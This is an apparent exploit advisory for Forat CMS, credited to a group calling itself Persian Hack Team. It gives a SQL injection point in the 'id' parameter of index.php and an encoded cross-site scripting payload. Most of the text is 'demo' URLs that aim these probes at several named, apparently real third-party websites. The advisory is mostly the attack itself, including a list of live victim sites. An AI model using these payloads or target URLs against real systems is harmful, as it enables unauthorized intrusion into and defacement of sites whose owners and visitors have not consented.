######################
# Exploit Title : Forat CMS - SQL Injection / XSS
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.foratnet.com/
# Category: [ Webapps ]
# Tested on: [ Win ]
# Date: 2016/05/27
######################
#
# PoC:
# 1.Sql injection =
# http://site.com/index.php?act=artc&id=[SQL]
# Demo :
# http://www.mudharclub.org.sa/index.php?act=artc&id=686%27
# http://okhdood.net/index.php?act=artc&id=17247%27
# http://www.umalhamam.org/index.php?act=artc&id=9677%27
# http://www.minbaralqatif.net/?act=artc&id=323%27
# http://www.al-saif.net/?act=artc&id=311%27
# 2.XSS =
# Demo:
# http://www.mudharclub.org.sa/index.php?act=artc&id=%27%3E%3Cmarquee%3E%3Cfont%20color=red%20size=4px%3Ec_C%20%3C/font%3E%3C/marquee%3E
# http://okhdood.net/index.php?act=artc&id=%27%3E%3Cmarquee%3E%3Cfont%20color=red%20size=4px%3Ec_C%20%3C/font%3E%3C/marquee%3E
#
######################
# Discovered by :
# Mojtaba MobhaM & T3NZOG4N & FireKernel
# Greetz : Milad Hacking And All Persian Hack Team Members
# Homepage : persian-team.ir
######################